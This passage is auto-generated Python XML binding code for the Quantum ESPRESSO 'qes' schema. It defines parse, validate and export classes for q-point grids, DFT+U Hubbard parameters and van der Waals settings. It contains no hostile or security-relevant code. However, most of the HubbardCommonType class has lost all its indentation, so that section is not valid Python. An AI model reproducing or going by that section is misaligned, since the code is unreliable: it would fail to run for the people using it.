            ival_ = self.gds_validate_boolean(ival_, node, 'x_gamma_extrapolation')
            self.x_gamma_extrapolation = ival_
        elif nodeName_ == 'ecutvcut' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'ecutvcut')
            self.ecutvcut = fval_
# end class hybridType
class qpoint_gridType(GeneratedsSuper):
    """Generated binding for the qes ``qpoint_gridType`` XML complex type.

    A text element carrying the q-point list, with three positive-integer
    attributes ``nqx1``/``nqx2``/``nqx3`` giving the grid dimensions.
    """
    subclass = None
    superclass = None
    def __init__(self, nqx1=None, nqx2=None, nqx3=None, valueOf_=None):
        self.original_tagname_ = None
        # Attribute values pass through the module-level _cast helper with
        # a target type of int.
        self.nqx1 = _cast(int, nqx1)
        self.nqx2 = _cast(int, nqx2)
        self.nqx3 = _cast(int, nqx3)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Prefer an externally registered subclass, then the class-level
        # ``subclass`` hook, then the plain class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, qpoint_gridType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if qpoint_gridType.subclass:
            return qpoint_gridType.subclass(*args_, **kwargs_)
        else:
            return qpoint_gridType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Accessor pairs kept for API compatibility with generated callers.
    def get_nqx1(self): return self.nqx1
    def set_nqx1(self, nqx1): self.nqx1 = nqx1
    def get_nqx2(self): return self.nqx2
    def set_nqx2(self, nqx2): self.nqx2 = nqx2
    def get_nqx3(self): return self.nqx3
    def set_nqx3(self, nqx3): self.nqx3 = nqx3
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # Numeric values (including 0) always count as content; other
        # values count by ordinary truthiness.
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='qpoint_gridType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element (attributes plus text content) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('qpoint_gridType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='qpoint_gridType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='qpoint_gridType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='qpoint_gridType'):
        """Write the nqx1/nqx2/nqx3 attributes that are present."""
        if self.nqx1 is not None and 'nqx1' not in already_processed:
            already_processed.add('nqx1')
            outfile.write(' nqx1="%s"' % self.gds_format_integer(self.nqx1, input_name='nqx1'))
        if self.nqx2 is not None and 'nqx2' not in already_processed:
            already_processed.add('nqx2')
            outfile.write(' nqx2="%s"' % self.gds_format_integer(self.nqx2, input_name='nqx2'))
        if self.nqx3 is not None and 'nqx3' not in already_processed:
            already_processed.add('nqx3')
            outfile.write(' nqx3="%s"' % self.gds_format_integer(self.nqx3, input_name='nqx3'))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='qpoint_gridType', fromsubclass_=False, pretty_print=True):
        # Text-only element: no child elements to write.
        pass
    def build(self, node):
        """Populate attributes and text content from ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse nqx1/nqx2/nqx3 as positive integers; raise a parse error
        on non-integer or non-positive values."""
        value = find_attr_value_('nqx1', node)
        if value is not None and 'nqx1' not in already_processed:
            already_processed.add('nqx1')
            try:
                self.nqx1 = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.nqx1 <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        value = find_attr_value_('nqx2', node)
        if value is not None and 'nqx2' not in already_processed:
            already_processed.add('nqx2')
            try:
                self.nqx2 = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.nqx2 <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        value = find_attr_value_('nqx3', node)
        if value is not None and 'nqx3' not in already_processed:
            already_processed.add('nqx3')
            try:
                self.nqx3 = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.nqx3 <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class qpoint_gridType
class dftUType(GeneratedsSuper):
    """Generated binding for the qes ``dftUType`` XML complex type.

    DFT+U parameters: the ``lda_plus_u_kind`` flag, repeated per-species
    Hubbard parameter elements (U, J0, alpha, beta, J, starting_ns,
    Hubbard_ns) and the ``U_projection_type`` string.
    """
    subclass = None
    superclass = None
    def __init__(self, lda_plus_u_kind=None, Hubbard_U=None, Hubbard_J0=None, Hubbard_alpha=None, Hubbard_beta=None, Hubbard_J=None, starting_ns=None, Hubbard_ns=None, U_projection_type=None):
        self.original_tagname_ = None
        self.lda_plus_u_kind = lda_plus_u_kind
        # Repeated elements default to fresh empty lists (never a shared
        # mutable default).
        if Hubbard_U is None:
            self.Hubbard_U = []
        else:
            self.Hubbard_U = Hubbard_U
        if Hubbard_J0 is None:
            self.Hubbard_J0 = []
        else:
            self.Hubbard_J0 = Hubbard_J0
        if Hubbard_alpha is None:
            self.Hubbard_alpha = []
        else:
            self.Hubbard_alpha = Hubbard_alpha
        if Hubbard_beta is None:
            self.Hubbard_beta = []
        else:
            self.Hubbard_beta = Hubbard_beta
        if Hubbard_J is None:
            self.Hubbard_J = []
        else:
            self.Hubbard_J = Hubbard_J
        if starting_ns is None:
            self.starting_ns = []
        else:
            self.starting_ns = starting_ns
        if Hubbard_ns is None:
            self.Hubbard_ns = []
        else:
            self.Hubbard_ns = Hubbard_ns
        self.U_projection_type = U_projection_type
        self.validate_HubbardProjType(self.U_projection_type)
    def factory(*args_, **kwargs_):
        # Prefer an externally registered subclass, then the class-level
        # ``subclass`` hook, then the plain class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, dftUType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if dftUType.subclass:
            return dftUType.subclass(*args_, **kwargs_)
        else:
            return dftUType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Accessor/mutator trios (get/set plus add/insert/replace for repeated
    # elements) kept for API compatibility with generated callers.
    def get_lda_plus_u_kind(self): return self.lda_plus_u_kind
    def set_lda_plus_u_kind(self, lda_plus_u_kind): self.lda_plus_u_kind = lda_plus_u_kind
    def get_Hubbard_U(self): return self.Hubbard_U
    def set_Hubbard_U(self, Hubbard_U): self.Hubbard_U = Hubbard_U
    def add_Hubbard_U(self, value): self.Hubbard_U.append(value)
    def insert_Hubbard_U_at(self, index, value): self.Hubbard_U.insert(index, value)
    def replace_Hubbard_U_at(self, index, value): self.Hubbard_U[index] = value
    def get_Hubbard_J0(self): return self.Hubbard_J0
    def set_Hubbard_J0(self, Hubbard_J0): self.Hubbard_J0 = Hubbard_J0
    def add_Hubbard_J0(self, value): self.Hubbard_J0.append(value)
    def insert_Hubbard_J0_at(self, index, value): self.Hubbard_J0.insert(index, value)
    def replace_Hubbard_J0_at(self, index, value): self.Hubbard_J0[index] = value
    def get_Hubbard_alpha(self): return self.Hubbard_alpha
    def set_Hubbard_alpha(self, Hubbard_alpha): self.Hubbard_alpha = Hubbard_alpha
    def add_Hubbard_alpha(self, value): self.Hubbard_alpha.append(value)
    def insert_Hubbard_alpha_at(self, index, value): self.Hubbard_alpha.insert(index, value)
    def replace_Hubbard_alpha_at(self, index, value): self.Hubbard_alpha[index] = value
    def get_Hubbard_beta(self): return self.Hubbard_beta
    def set_Hubbard_beta(self, Hubbard_beta): self.Hubbard_beta = Hubbard_beta
    def add_Hubbard_beta(self, value): self.Hubbard_beta.append(value)
    def insert_Hubbard_beta_at(self, index, value): self.Hubbard_beta.insert(index, value)
    def replace_Hubbard_beta_at(self, index, value): self.Hubbard_beta[index] = value
    def get_Hubbard_J(self): return self.Hubbard_J
    def set_Hubbard_J(self, Hubbard_J): self.Hubbard_J = Hubbard_J
    def add_Hubbard_J(self, value): self.Hubbard_J.append(value)
    def insert_Hubbard_J_at(self, index, value): self.Hubbard_J.insert(index, value)
    def replace_Hubbard_J_at(self, index, value): self.Hubbard_J[index] = value
    def get_starting_ns(self): return self.starting_ns
    def set_starting_ns(self, starting_ns): self.starting_ns = starting_ns
    def add_starting_ns(self, value): self.starting_ns.append(value)
    def insert_starting_ns_at(self, index, value): self.starting_ns.insert(index, value)
    def replace_starting_ns_at(self, index, value): self.starting_ns[index] = value
    def get_Hubbard_ns(self): return self.Hubbard_ns
    def set_Hubbard_ns(self, Hubbard_ns): self.Hubbard_ns = Hubbard_ns
    def add_Hubbard_ns(self, value): self.Hubbard_ns.append(value)
    def insert_Hubbard_ns_at(self, index, value): self.Hubbard_ns.insert(index, value)
    def replace_Hubbard_ns_at(self, index, value): self.Hubbard_ns[index] = value
    def get_U_projection_type(self): return self.U_projection_type
    def set_U_projection_type(self, U_projection_type): self.U_projection_type = U_projection_type
    def validate_HubbardProjType(self, value):
        # Validate type HubbardProjType, a restriction on string.
        # Warns (does not raise) when the value is not a known projection type.
        if value is not None and Validate_simpletypes_:
            value = str(value)
            enumerations = ['atomic', 'ortho-atomic', 'norm-atomic', 'pseudo', 'file']
            enumeration_respectee = False
            for enum in enumerations:
                if value == enum:
                    enumeration_respectee = True
                    break
            if not enumeration_respectee:
                # NOTE(review): under Python 3, .encode("utf-8") yields bytes,
                # so the interpolated warning reads b'...' — harmless but ugly.
                warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on HubbardProjType' % {"value" : value.encode("utf-8")} )
    def hasContent_(self):
        # True when any scalar child is set or any repeated list is non-empty.
        if (
            self.lda_plus_u_kind is not None or
            self.Hubbard_U or
            self.Hubbard_J0 or
            self.Hubbard_alpha or
            self.Hubbard_beta or
            self.Hubbard_J or
            self.starting_ns or
            self.Hubbard_ns or
            self.U_projection_type is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='dftUType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element (attributes, then children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('dftUType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='dftUType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='dftUType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='dftUType'):
        # dftUType carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='dftUType', fromsubclass_=False, pretty_print=True):
        """Write the scalar children and every element of each repeated list."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.lda_plus_u_kind is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:lda_plus_u_kind>%s</qes:lda_plus_u_kind>%s' % (self.gds_format_integer(self.lda_plus_u_kind, input_name='lda_plus_u_kind'), eol_))
        for Hubbard_U_ in self.Hubbard_U:
            Hubbard_U_.export(outfile, level, namespaceprefix_, name_='Hubbard_U', pretty_print=pretty_print)
        for Hubbard_J0_ in self.Hubbard_J0:
            Hubbard_J0_.export(outfile, level, namespaceprefix_, name_='Hubbard_J0', pretty_print=pretty_print)
        for Hubbard_alpha_ in self.Hubbard_alpha:
            Hubbard_alpha_.export(outfile, level, namespaceprefix_, name_='Hubbard_alpha', pretty_print=pretty_print)
        for Hubbard_beta_ in self.Hubbard_beta:
            Hubbard_beta_.export(outfile, level, namespaceprefix_, name_='Hubbard_beta', pretty_print=pretty_print)
        for Hubbard_J_ in self.Hubbard_J:
            Hubbard_J_.export(outfile, level, namespaceprefix_, name_='Hubbard_J', pretty_print=pretty_print)
        for starting_ns_ in self.starting_ns:
            starting_ns_.export(outfile, level, namespaceprefix_, name_='starting_ns', pretty_print=pretty_print)
        for Hubbard_ns_ in self.Hubbard_ns:
            Hubbard_ns_.export(outfile, level, namespaceprefix_, name_='Hubbard_ns', pretty_print=pretty_print)
        if self.U_projection_type is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:U_projection_type>%s</qes:U_projection_type>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.U_projection_type), input_name='U_projection_type')), eol_))
    def build(self, node):
        """Populate this instance from ElementTree *node* and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch on the child tag name; repeated Hubbard elements are
        appended to their respective lists."""
        if nodeName_ == 'lda_plus_u_kind' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            ival_ = self.gds_validate_integer(ival_, node, 'lda_plus_u_kind')
            self.lda_plus_u_kind = ival_
        elif nodeName_ == 'Hubbard_U':
            obj_ = HubbardCommonType.factory()
            obj_.build(child_)
            self.Hubbard_U.append(obj_)
            obj_.original_tagname_ = 'Hubbard_U'
        elif nodeName_ == 'Hubbard_J0':
            obj_ = HubbardCommonType.factory()
            obj_.build(child_)
            self.Hubbard_J0.append(obj_)
            obj_.original_tagname_ = 'Hubbard_J0'
        elif nodeName_ == 'Hubbard_alpha':
            obj_ = HubbardCommonType.factory()
            obj_.build(child_)
            self.Hubbard_alpha.append(obj_)
            obj_.original_tagname_ = 'Hubbard_alpha'
        elif nodeName_ == 'Hubbard_beta':
            obj_ = HubbardCommonType.factory()
            obj_.build(child_)
            self.Hubbard_beta.append(obj_)
            obj_.original_tagname_ = 'Hubbard_beta'
        elif nodeName_ == 'Hubbard_J':
            obj_ = HubbardJType.factory()
            obj_.build(child_)
            self.Hubbard_J.append(obj_)
            obj_.original_tagname_ = 'Hubbard_J'
        elif nodeName_ == 'starting_ns':
            obj_ = starting_nsType.factory()
            obj_.build(child_)
            self.starting_ns.append(obj_)
            obj_.original_tagname_ = 'starting_ns'
        elif nodeName_ == 'Hubbard_ns':
            obj_ = Hubbard_nsType.factory()
            obj_.build(child_)
            self.Hubbard_ns.append(obj_)
            obj_.original_tagname_ = 'Hubbard_ns'
        elif nodeName_ == 'U_projection_type':
            U_projection_type_ = child_.text
            U_projection_type_ = self.gds_validate_string(U_projection_type_, node, 'U_projection_type')
            self.U_projection_type = U_projection_type_
            # validate type HubbardProjType
            self.validate_HubbardProjType(self.U_projection_type)
# end class dftUType
class HubbardCommonType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, specie=None, label=None, valueOf_=None):
self.original_tagname_ = None
self.specie = _cast(None, specie)
self.label = _cast(None, label)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, HubbardCommonType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if HubbardCommonType.subclass:
return HubbardCommonType.subclass(*args_, **kwargs_)
else:
return HubbardCommonType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_specie(self): return self.specie
def set_specie(self, specie): self.specie = specie
def get_label(self): return self.label
def set_label(self, label): self.label = label
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='HubbardCommonType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('HubbardCommonType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='HubbardCommonType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='HubbardCommonType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='HubbardCommonType'):
if self.specie is not None and 'specie' not in already_processed:
already_processed.add('specie')
outfile.write(' specie=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.specie), input_name='specie')), ))
if self.label is not None and 'label' not in already_processed:
already_processed.add('label')
outfile.write(' label=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.label), input_name='label')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='HubbardCommonType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read the `specie` and `label` attributes from *node*, each at most once."""
        value = find_attr_value_('specie', node)
        if value is not None and 'specie' not in already_processed:
            already_processed.add('specie')
            self.specie = value
        value = find_attr_value_('label', node)
        if value is not None and 'label' not in already_processed:
            already_processed.add('label')
            self.label = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple-content type: no child elements are expected.
        pass
# end class HubbardCommonType
class HubbardJType(GeneratedsSuper):
    """Generated XML binding for the `HubbardJType` schema type.

    A simple-content element (text value stored in ``valueOf_``) carrying two
    string attributes, ``specie`` and ``label``.
    """
    # Generation hooks: assigning a class here redirects factory() construction.
    subclass = None
    superclass = None
    def __init__(self, specie=None, label=None, valueOf_=None):
        self.original_tagname_ = None
        self.specie = _cast(None, specie)
        self.label = _cast(None, label)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        """Construct an instance, honoring subclass-module and `subclass` overrides."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, HubbardJType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if HubbardJType.subclass:
            return HubbardJType.subclass(*args_, **kwargs_)
        else:
            return HubbardJType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_specie(self): return self.specie
    def set_specie(self, specie): self.specie = specie
    def get_label(self): return self.label
    def set_label(self, label): self.label = label
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # Numeric zero still counts as content; only None/empty text does not.
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='HubbardJType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('HubbardJType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Preserve the tag name this object was originally parsed from.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='HubbardJType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='HubbardJType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='HubbardJType'):
        """Emit the `specie` and `label` attributes, each at most once."""
        if self.specie is not None and 'specie' not in already_processed:
            already_processed.add('specie')
            outfile.write(' specie=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.specie), input_name='specie')), ))
        if self.label is not None and 'label' not in already_processed:
            already_processed.add('label')
            outfile.write(' label=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.label), input_name='label')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='HubbardJType', fromsubclass_=False, pretty_print=True):
        # Simple-content type: no child elements.
        pass
    def build(self, node):
        """Populate this object from an ElementTree node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('specie', node)
        if value is not None and 'specie' not in already_processed:
            already_processed.add('specie')
            self.specie = value
        value = find_attr_value_('label', node)
        if value is not None and 'label' not in already_processed:
            already_processed.add('label')
            self.label = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class HubbardJType
class vdWType(GeneratedsSuper):
    """Generated XML binding for the `vdWType` schema type.

    Holds van-der-Waals correction settings: string children ``vdw_corr`` and
    ``non_local_term``, double children ``london_s6``, ``ts_vdw_econv_thr``,
    ``london_rcut``, ``xdm_a1``, ``xdm_a2``, boolean ``ts_vdw_isolated``, and a
    repeatable ``london_c6`` element (built as HubbardCommonType objects).
    """
    subclass = None
    superclass = None
    def __init__(self, vdw_corr=None, non_local_term=None, london_s6=None, ts_vdw_econv_thr=None, ts_vdw_isolated=None, london_rcut=None, xdm_a1=None, xdm_a2=None, london_c6=None):
        self.original_tagname_ = None
        self.vdw_corr = vdw_corr
        self.non_local_term = non_local_term
        self.london_s6 = london_s6
        self.ts_vdw_econv_thr = ts_vdw_econv_thr
        self.ts_vdw_isolated = ts_vdw_isolated
        self.london_rcut = london_rcut
        self.xdm_a1 = xdm_a1
        self.xdm_a2 = xdm_a2
        # Default to a fresh list per instance (never a shared mutable default).
        if london_c6 is None:
            self.london_c6 = []
        else:
            self.london_c6 = london_c6
    def factory(*args_, **kwargs_):
        """Construct an instance, honoring subclass-module and `subclass` overrides."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, vdWType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if vdWType.subclass:
            return vdWType.subclass(*args_, **kwargs_)
        else:
            return vdWType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_vdw_corr(self): return self.vdw_corr
    def set_vdw_corr(self, vdw_corr): self.vdw_corr = vdw_corr
    def get_non_local_term(self): return self.non_local_term
    def set_non_local_term(self, non_local_term): self.non_local_term = non_local_term
    def get_london_s6(self): return self.london_s6
    def set_london_s6(self, london_s6): self.london_s6 = london_s6
    def get_ts_vdw_econv_thr(self): return self.ts_vdw_econv_thr
    def set_ts_vdw_econv_thr(self, ts_vdw_econv_thr): self.ts_vdw_econv_thr = ts_vdw_econv_thr
    def get_ts_vdw_isolated(self): return self.ts_vdw_isolated
    def set_ts_vdw_isolated(self, ts_vdw_isolated): self.ts_vdw_isolated = ts_vdw_isolated
    def get_london_rcut(self): return self.london_rcut
    def set_london_rcut(self, london_rcut): self.london_rcut = london_rcut
    def get_xdm_a1(self): return self.xdm_a1
    def set_xdm_a1(self, xdm_a1): self.xdm_a1 = xdm_a1
    def get_xdm_a2(self): return self.xdm_a2
    def set_xdm_a2(self, xdm_a2): self.xdm_a2 = xdm_a2
    def get_london_c6(self): return self.london_c6
    def set_london_c6(self, london_c6): self.london_c6 = london_c6
    def add_london_c6(self, value): self.london_c6.append(value)
    def insert_london_c6_at(self, index, value): self.london_c6.insert(index, value)
    def replace_london_c6_at(self, index, value): self.london_c6[index] = value
    def hasContent_(self):
        # True if any child element is present (non-None scalar or non-empty list).
        if (
            self.vdw_corr is not None or
            self.non_local_term is not None or
            self.london_s6 is not None or
            self.ts_vdw_econv_thr is not None or
            self.ts_vdw_isolated is not None or
            self.london_rcut is not None or
            self.xdm_a1 is not None or
            self.xdm_a2 is not None or
            self.london_c6
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='vdWType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element and its children as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('vdWType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Preserve the tag name this object was originally parsed from.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='vdWType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='vdWType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='vdWType'):
        # This type defines no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='vdWType', fromsubclass_=False, pretty_print=True):
        """Write each non-None child element, in schema order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.vdw_corr is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:vdw_corr>%s</qes:vdw_corr>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.vdw_corr), input_name='vdw_corr')), eol_))
        if self.non_local_term is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:non_local_term>%s</qes:non_local_term>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.non_local_term), input_name='non_local_term')), eol_))
        if self.london_s6 is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:london_s6>%s</qes:london_s6>%s' % (self.gds_format_double(self.london_s6, input_name='london_s6'), eol_))
        if self.ts_vdw_econv_thr is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ts_vdw_econv_thr>%s</qes:ts_vdw_econv_thr>%s' % (self.gds_format_double(self.ts_vdw_econv_thr, input_name='ts_vdw_econv_thr'), eol_))
        if self.ts_vdw_isolated is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ts_vdw_isolated>%s</qes:ts_vdw_isolated>%s' % (self.gds_format_boolean(self.ts_vdw_isolated, input_name='ts_vdw_isolated'), eol_))
        if self.london_rcut is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:london_rcut>%s</qes:london_rcut>%s' % (self.gds_format_double(self.london_rcut, input_name='london_rcut'), eol_))
        if self.xdm_a1 is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:xdm_a1>%s</qes:xdm_a1>%s' % (self.gds_format_double(self.xdm_a1, input_name='xdm_a1'), eol_))
        if self.xdm_a2 is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:xdm_a2>%s</qes:xdm_a2>%s' % (self.gds_format_double(self.xdm_a2, input_name='xdm_a2'), eol_))
        for london_c6_ in self.london_c6:
            london_c6_.export(outfile, level, namespaceprefix_, name_='london_c6', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an ElementTree node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
